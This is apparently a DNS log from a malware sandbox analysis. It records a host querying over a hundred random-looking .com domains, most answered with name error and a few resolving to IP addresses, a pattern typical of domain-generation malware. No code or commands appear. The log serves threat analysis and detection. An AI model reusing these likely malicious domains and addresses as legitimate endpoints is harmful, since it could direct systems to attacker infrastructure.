Nov 11, 2024 18:14:02.988159895 CET	1.1.1.1	192.168.2.6	0x2fd0	Name error (3)	lygynyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.989770889 CET	1.1.1.1	192.168.2.6	0x671	Name error (3)	volyjif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.007323980 CET	1.1.1.1	192.168.2.6	0x25e2	Name error (3)	vofybet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.009205103 CET	1.1.1.1	192.168.2.6	0x434b	Name error (3)	qeqytuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.009360075 CET	1.1.1.1	192.168.2.6	0x1672	Name error (3)	lyvywar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.015121937 CET	1.1.1.1	192.168.2.6	0xf17a	Name error (3)	qekyhug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.028049946 CET	1.1.1.1	192.168.2.6	0xb9d5	Name error (3)	lysyvax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.032881021 CET	1.1.1.1	192.168.2.6	0x8e1	Name error (3)	gacykas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.034303904 CET	1.1.1.1	192.168.2.6	0x5441	Name error (3)	lykygun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.036988020 CET	1.1.1.1	192.168.2.6	0xb0c3	Name error (3)	pupycop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.040926933 CET	1.1.1.1	192.168.2.6	0xcd67	Name error (3)	gatycis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.041682959 CET	1.1.1.1	192.168.2.6	0xf693	Name error (3)	ganyrew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.042175055 CET	1.1.1.1	192.168.2.6	0x931a	Name error (3)	pujygug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.042766094 CET	1.1.1.1	192.168.2.6	0x4d9a	Name error (3)	puvywal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.043397903 CET	1.1.1.1	192.168.2.6	0xe461	Name error (3)	qebyrel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.043958902 CET	1.1.1.1	192.168.2.6	0x571b	Name error (3)	gahynuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.059297085 CET	1.1.1.1	192.168.2.6	0x4692	Name error (3)	vojygym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.060163975 CET	1.1.1.1	192.168.2.6	0x8b8d	Name error (3)	vonyryk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.062192917 CET	1.1.1.1	192.168.2.6	0x6480	Name error (3)	vopycoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.065145016 CET	1.1.1.1	192.168.2.6	0xf178	Name error (3)	qetyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.069401026 CET	1.1.1.1	192.168.2.6	0x39d2	Name error (3)	gadyvez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.069425106 CET	1.1.1.1	192.168.2.6	0xedb	Name error (3)	puvylep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.081582069 CET	1.1.1.1	192.168.2.6	0x211	Name error (3)	gaqypuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.129875898 CET	1.1.1.1	192.168.2.6	0x353f	Name error (3)	vowypim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.149805069 CET	1.1.1.1	192.168.2.6	0xfbce	Name error (3)	puzyjov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.150995016 CET	1.1.1.1	192.168.2.6	0x2ffb	Name error (3)	lymytuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.736269951 CET	1.1.1.1	192.168.2.6	0x2f87	Name error (3)	qekynyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.736859083 CET	1.1.1.1	192.168.2.6	0x3fed	Name error (3)	vonykam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.738087893 CET	1.1.1.1	192.168.2.6	0xaa7f	Name error (3)	pumyleg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.740247965 CET	1.1.1.1	192.168.2.6	0xe54c	Name error (3)	volymuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.743263006 CET	1.1.1.1	192.168.2.6	0x1530	Name error (3)	galynus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.747870922 CET	1.1.1.1	192.168.2.6	0x8705	Name error (3)	vopyput.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.748939991 CET	1.1.1.1	192.168.2.6	0x177a	Name error (3)	pupypil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.752357006 CET	1.1.1.1	192.168.2.6	0x7d09	Name error (3)	qexynyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.756891012 CET	1.1.1.1	192.168.2.6	0xd01c	Name error (3)	qedysol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.757020950 CET	1.1.1.1	192.168.2.6	0x367d	Name error (3)	lysysir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.759793997 CET	1.1.1.1	192.168.2.6	0xbae5	Name error (3)	lymylen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.760242939 CET	1.1.1.1	192.168.2.6	0x2b0a	Name error (3)	lygysid.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.762159109 CET	1.1.1.1	192.168.2.6	0xdb7d	Name error (3)	pufypuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.776245117 CET	1.1.1.1	192.168.2.6	0x91e9	Name error (3)	vowykat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.785670996 CET	1.1.1.1	192.168.2.6	0xa335	Name error (3)	purylal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.794873953 CET	1.1.1.1	192.168.2.6	0x437a	Name error (3)	puzygyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.795701027 CET	1.1.1.1	192.168.2.6	0x6907	Name error (3)	gacynyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.798528910 CET	1.1.1.1	192.168.2.6	0xc962	Name error (3)	vocyjik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.798715115 CET	1.1.1.1	192.168.2.6	0xe9b9	Name error (3)	qedyxuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.802421093 CET	1.1.1.1	192.168.2.6	0x872d	Name error (3)	vofycim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.804538012 CET	1.1.1.1	192.168.2.6	0xc3dd	Name error (3)	galyfez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.804625034 CET	1.1.1.1	192.168.2.6	0x1232	Name error (3)	lyxygur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.808871031 CET	1.1.1.1	192.168.2.6	0x30eb	Name error (3)	gacyhuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.811295986 CET	1.1.1.1	192.168.2.6	0x8b7a	Name error (3)	qegysiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.815247059 CET	1.1.1.1	192.168.2.6	0x5a23	Name error (3)	vocymum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.824275970 CET	1.1.1.1	192.168.2.6	0xec4a	Name error (3)	gadycih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.841306925 CET	1.1.1.1	192.168.2.6	0xb178	Name error (3)	qekyfep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.841439962 CET	1.1.1.1	192.168.2.6	0x6f88	Name error (3)	gahyvab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.842030048 CET	1.1.1.1	192.168.2.6	0xdc7c	Name error (3)	pufycog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.843218088 CET	1.1.1.1	192.168.2.6	0x7f69	Name error (3)	lygyvon.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.843410969 CET	1.1.1.1	192.168.2.6	0x7eb6	Name error (3)	vonyqof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.844074011 CET	1.1.1.1	192.168.2.6	0x1a72	Name error (3)	lysyxuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.844605923 CET	1.1.1.1	192.168.2.6	0xd0e3	Name error (3)	gaqyres.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.845268011 CET	1.1.1.1	192.168.2.6	0x68b7	Name error (3)	purytyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.846663952 CET	1.1.1.1	192.168.2.6	0xe991	Name error (3)	lykyfax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.846869946 CET	1.1.1.1	192.168.2.6	0x82f1	Name error (3)	gahydos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.847119093 CET	1.1.1.1	192.168.2.6	0x6339	Name error (3)	puvymug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.847455025 CET	1.1.1.1	192.168.2.6	0x2d72	Name error (3)	qebyqig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.847569942 CET	1.1.1.1	192.168.2.6	0x6cee	Name error (3)	pujydap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.848143101 CET	1.1.1.1	192.168.2.6	0x1b2d	Name error (3)	vopyzyk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.848761082 CET	1.1.1.1	192.168.2.6	0x6167	Name error (3)	lyvymun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.850712061 CET	1.1.1.1	192.168.2.6	0x88f7	Name error (3)	lyrytyx.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.852406979 CET	1.1.1.1	192.168.2.6	0x4971	Name error (3)	qegyvag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.852783918 CET	1.1.1.1	192.168.2.6	0x5372	Name error (3)	volygyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.853219032 CET	1.1.1.1	192.168.2.6	0x5e3	Name error (3)	lyryler.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.856169939 CET	1.1.1.1	192.168.2.6	0x9813	Name error (3)	ganyqib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.857439041 CET	1.1.1.1	192.168.2.6	0x6ee7	Name error (3)	qeqyrav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.859020948 CET	1.1.1.1	192.168.2.6	0xc375	Name error (3)	pumywov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.866153955 CET	1.1.1.1	192.168.2.6	0xaa84	Name error (3)	qexyhul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.866193056 CET	1.1.1.1	192.168.2.6	0xae03	Name error (3)	vowyrec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.867115021 CET	1.1.1.1	192.168.2.6	0xbad6	Name error (3)	qetylel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.868246078 CET	1.1.1.1	192.168.2.6	0x88d6	Name error (3)	lymywad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.868830919 CET	1.1.1.1	192.168.2.6	0x6707	Name error (3)	gatyzyw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.869138002 CET	1.1.1.1	192.168.2.6	0x43f3	Name error (3)	pupyxuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.869810104 CET	1.1.1.1	192.168.2.6	0xc61e	Name error (3)	vojydoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.875403881 CET	1.1.1.1	192.168.2.6	0xec76	Name error (3)	ganykah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.876065016 CET	1.1.1.1	192.168.2.6	0xaf73	Name error (3)	vojybef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.876776934 CET	1.1.1.1	192.168.2.6	0x3554	Name error (3)	qebykoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.877034903 CET	1.1.1.1	192.168.2.6	0xcd0c	Name error (3)	pujybev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.877089977 CET	1.1.1.1	192.168.2.6	0x7734	Name error (3)	lykynyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.898248911 CET	1.1.1.1	192.168.2.6	0x5206	Name error (3)	gatypuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.899360895 CET	1.1.1.1	192.168.2.6	0x9b75	Name error (3)	qetytup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:05.007163048 CET	1.1.1.1	192.168.2.6	0xe0c1	Name error (3)	lyvyjoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:05.028227091 CET	1.1.1.1	192.168.2.6	0xd766	Name error (3)	puvyjiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.118123055 CET	1.1.1.1	192.168.2.6	0x9cbe	Name error (3)	puzybeq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.122951031 CET	1.1.1.1	192.168.2.6	0xecfb	Name error (3)	vocygef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.123701096 CET	1.1.1.1	192.168.2.6	0xd171	Name error (3)	qegyxup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.124222040 CET	1.1.1.1	192.168.2.6	0x1aee	Name error (3)	qeqykop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.135035038 CET	1.1.1.1	192.168.2.6	0x3995	Name error (3)	qexyfag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.138220072 CET	1.1.1.1	192.168.2.6	0x4499	Name error (3)	gaqyqiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.141679049 CET	1.1.1.1	192.168.2.6	0x7d8a	Name error (3)	galyvaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.142950058 CET	1.1.1.1	192.168.2.6	0x1ea2	Name error (3)	gadypub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.142962933 CET	1.1.1.1	192.168.2.6	0xaa76	Name error (3)	lymyjix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.144112110 CET	1.1.1.1	192.168.2.6	0x895e	Name error (3)	lyxynej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.148904085 CET	1.1.1.1	192.168.2.6	0xd031	Name error (3)	gacyfeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.149969101 CET	1.1.1.1	192.168.2.6	0x5fff	Name error (3)	lygyxux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.159756899 CET	1.1.1.1	192.168.2.6	0x104a	Name error (3)	vowyqik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.163476944 CET	1.1.1.1	192.168.2.6	0x32ff	Name error (3)	pumyjip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.163878918 CET	1.1.1.1	192.168.2.6	0xb71	Name error (3)	lysytyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.165132046 CET	1.1.1.1	192.168.2.6	0xa69d	Name error (3)	volybak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.166119099 CET	1.1.1.1	192.168.2.6	0xc44c	Name error (3)	vonyjuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.167279959 CET	1.1.1.1	192.168.2.6	0x9400	Name error (3)	lyvygyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.170248985 CET	1.1.1.1	192.168.2.6	0x49f5	Name error (3)	qedytyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.203866959 CET	1.1.1.1	192.168.2.6	0x2892	Name error (3)	purywoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.203882933 CET	1.1.1.1	192.168.2.6	0x977c	Name error (3)	pufyxyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.206208944 CET	1.1.1.1	192.168.2.6	0xf58a	Name error (3)	qebyhuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.206221104 CET	1.1.1.1	192.168.2.6	0xb21	Name error (3)	pupyteg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.206862926 CET	1.1.1.1	192.168.2.6	0x8d05	Name error (3)	qetyraq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.206873894 CET	1.1.1.1	192.168.2.6	0xbb89	Name error (3)	vofyzyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.210366011 CET	1.1.1.1	192.168.2.6	0x1d1c	Name error (3)	lyxyfan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.227654934 CET	1.1.1.1	192.168.2.6	0x2e1d	Name error (3)	ganyhus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.227998018 CET	1.1.1.1	192.168.2.6	0xc46d	Name error (3)	puzydog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.228717089 CET	1.1.1.1	192.168.2.6	0xf179	Name error (3)	lyrywoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.228729963 CET	1.1.1.1	192.168.2.6	0x308a	Name error (3)	lykyvor.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.230501890 CET	1.1.1.1	192.168.2.6	0xaefd	Name error (3)	qekyvol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.230531931 CET	1.1.1.1	192.168.2.6	0xfbcd	Name error (3)	puvygyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.232337952 CET	1.1.1.1	192.168.2.6	0x62d3	Name error (3)	vopyrem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.232348919 CET	1.1.1.1	192.168.2.6	0x73df	Name error (3)	gaqykoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.237881899 CET	1.1.1.1	192.168.2.6	0x5982	Name error (3)	vofypuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.238010883 CET	1.1.1.1	192.168.2.6	0xbfc3	Name error (3)	pujycil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.238554955 CET	1.1.1.1	192.168.2.6	0xd16a	Name error (3)	gatyrah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.250179052 CET	1.1.1.1	192.168.2.6	0x9a5c	Name error (3)	qeqyqul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.254235029 CET	1.1.1.1	192.168.2.6	0x3603	Name error (3)	vojycit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.260226011 CET	1.1.1.1	192.168.2.6	0xb099	Name error (3)	gahycuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.315432072 CET	1.1.1.1	192.168.2.6	0x514d	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.315432072 CET	1.1.1.1	192.168.2.6	0x514d	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.321082115 CET	1.1.1.1	192.168.2.6	0x81af	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.321082115 CET	1.1.1.1	192.168.2.6	0x81af	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.321082115 CET	1.1.1.1	192.168.2.6	0x81af	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.321082115 CET	1.1.1.1	192.168.2.6	0x81af	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.321082115 CET	1.1.1.1	192.168.2.6	0x81af	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.321082115 CET	1.1.1.1	192.168.2.6	0x81af	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.321082115 CET	1.1.1.1	192.168.2.6	0x81af	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.321082115 CET	1.1.1.1	192.168.2.6	0x81af	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.322904110 CET	1.1.1.1	192.168.2.6	0xb3ee	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.325942993 CET	1.1.1.1	192.168.2.6	0xe457	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.329788923 CET	1.1.1.1	192.168.2.6	0x835c	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.329823017 CET	1.1.1.1	192.168.2.6	0xcef3	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.333076000 CET	1.1.1.1	192.168.2.6	0xb284	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.337578058 CET	1.1.1.1	192.168.2.6	0xb3e3	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.341279984 CET	1.1.1.1	192.168.2.6	0x6ab7	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.342479944 CET	1.1.1.1	192.168.2.6	0x851d	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.343429089 CET	1.1.1.1	192.168.2.6	0xb30f	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.345133066 CET	1.1.1.1	192.168.2.6	0x377c	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.348990917 CET	1.1.1.1	192.168.2.6	0x5c0f	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.349941015 CET	1.1.1.1	192.168.2.6	0xb83c	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.350984097 CET	1.1.1.1	192.168.2.6	0x4809	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.361160040 CET	1.1.1.1	192.168.2.6	0x600d	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.362102985 CET	1.1.1.1	192.168.2.6	0xbffa	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.371172905 CET	1.1.1.1	192.168.2.6	0x423c	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.374010086 CET	1.1.1.1	192.168.2.6	0x86b1	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.374042988 CET	1.1.1.1	192.168.2.6	0x52b0	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.374078989 CET	1.1.1.1	192.168.2.6	0x541f	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.377984047 CET	1.1.1.1	192.168.2.6	0x5f57	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.378844976 CET	1.1.1.1	192.168.2.6	0x4517	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.378947020 CET	1.1.1.1	192.168.2.6	0xfc77	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.379409075 CET	1.1.1.1	192.168.2.6	0xcaac	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.379667044 CET	1.1.1.1	192.168.2.6	0x7eaa	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.380871058 CET	1.1.1.1	192.168.2.6	0x326f	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.381411076 CET	1.1.1.1	192.168.2.6	0xceaf	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.381587029 CET	1.1.1.1	192.168.2.6	0xf887	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.385986090 CET	1.1.1.1	192.168.2.6	0x2f04	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.386380911 CET	1.1.1.1	192.168.2.6	0x549a	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.387008905 CET	1.1.1.1	192.168.2.6	0xb804	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.387911081 CET	1.1.1.1	192.168.2.6	0x295f	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.395459890 CET	1.1.1.1	192.168.2.6	0xe41e	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.395951033 CET	1.1.1.1	192.168.2.6	0x7f46	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.398183107 CET	1.1.1.1	192.168.2.6	0xb9bb	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.401374102 CET	1.1.1.1	192.168.2.6	0xa6a	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.401426077 CET	1.1.1.1	192.168.2.6	0x359f	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.401626110 CET	1.1.1.1	192.168.2.6	0xb58f	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.401925087 CET	1.1.1.1	192.168.2.6	0xaaf	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.402431011 CET	1.1.1.1	192.168.2.6	0xd12f	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.403537035 CET	1.1.1.1	192.168.2.6	0xdafe	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.404441118 CET	1.1.1.1	192.168.2.6	0xd298	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.404441118 CET	1.1.1.1	192.168.2.6	0xd298	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:52.406949997 CET	1.1.1.1	192.168.2.6	0x9861	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
